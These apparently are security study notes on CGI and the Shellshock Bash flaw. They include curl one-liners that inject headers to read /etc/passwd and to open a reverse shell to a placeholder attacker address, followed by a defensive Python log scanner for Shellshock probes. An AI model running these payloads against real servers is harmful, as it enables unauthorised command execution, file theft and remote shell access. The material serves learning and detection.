# CGI Applications

## **Introduction**

> * A Common Gateway Interface (CGI) is used to help a web server render dynamic pages and create a customized response for the user making a request via a web application.
> * CGI applications are primarily used to access other applications running on a web server.
> * CGI is essentially middleware between web servers, external databases, and information sources.
> * CGI scripts and programs are kept in the `/cgi-bin` directory on a web server.
> * Typically written in C, C++, Java, Perl, etc.
> * CGI scripts run in the security context of the web server.

***

## **CGI Applications - Shellshock \[CVE-2014-6271]**

> * The most well-known CGI attack is exploiting the Shellshock (aka, "Bash bug") vulnerability via CGI.
> * **Resource:** <https://nvd.nist.gov/vuln/detail/CVE-2014-6271>
> * **Affected Versions:** `GNU Bash up until version 4.3`
> * **Description:** Shellshock is a security flaw in the Bash shell that allows an attacker to `execute operating system commands that are included after a function stored inside an environment variable.`
> * **PoC Example:** `env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"`
>   * Nothing will happen when the environment variable is assigned a value
>   * If the target is vulnerable, whenever the environment variable is imported, the command `echo vulnerable-shellshock` will be executed
>   * If the target is NOT vulnerable, then only the command `echo not vulnerable` will be executed

**Shellshock PoC to read any file:**\
`curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://target.com/cgi-bin/access.cgi`

**Shellshock PoC to gain a Reverse Shell:**\
`curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/your-ip/your-nc-port 0>&1' http://target.com/cgi-bin/access.cgi`
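
**Detecting header-based Shellshock probes in access logs** (added example, not part of the original notes): the PoCs above work because CGI hands request headers to the script as environment variables, so a defender can flag logged header values that start like a Bash function definition. The function names, the "combined" log layout and the sample lines are assumptions made for this sketch.

```python
import re

# Vulnerable Bash treated an imported environment value beginning with "() {"
# as a function definition; whitespace tolerance here is a detection heuristic.
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# Assumed log layout: Apache/nginx "combined" (request, status, bytes, referer, agent).
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + " " + QUOTED
)

def cgi_env_name(header):
    """RFC 3875 meta-variable: 'User-Agent' reaches the CGI program as HTTP_USER_AGENT."""
    return "HTTP_" + header.upper().replace("-", "_")

def scan_line(line, cgi_prefix="/cgi-bin/"):
    """Return a finding for a log line whose logged headers look like a
    Bash function definition, or None if the line is clean or unparseable."""
    m = COMBINED.match(line)
    if not m:
        return None
    ip, request, status, referer, agent = m.groups()
    logged = {"Referer": referer, "User-Agent": agent}
    env = [cgi_env_name(h) for h, v in logged.items() if FUNC_PREFIX.match(v)]
    if not env:
        return None
    parts = request.split()
    path = parts[1] if len(parts) > 1 else ""
    # cgi_target separates probes that reached a CGI path from background noise.
    return {"ip": ip, "path": path, "status": int(status),
            "env": env, "cgi_target": path.startswith(cgi_prefix)}

# Constructed sample lines (documentation IP ranges, marker string from the PoC above).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" '
    '200 512 "-" "() { :; }; echo vulnerable-shellshock"',
    '198.51.100.4 - - [10/Oct/2014:13:56:01 +0000] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2014:13:57:12 +0000] "GET /index.html HTTP/1.1" '
    '404 209 "() { :;}; echo vulnerable-shellshock" "curl/7.38.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = scan_line(entry)
        if finding:
            print(finding)
```

Only headers that the log format records (here Referer and User-Agent) are covered; any other header a CGI script receives as an `HTTP_*` variable needs its own logging to be visible to this check.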


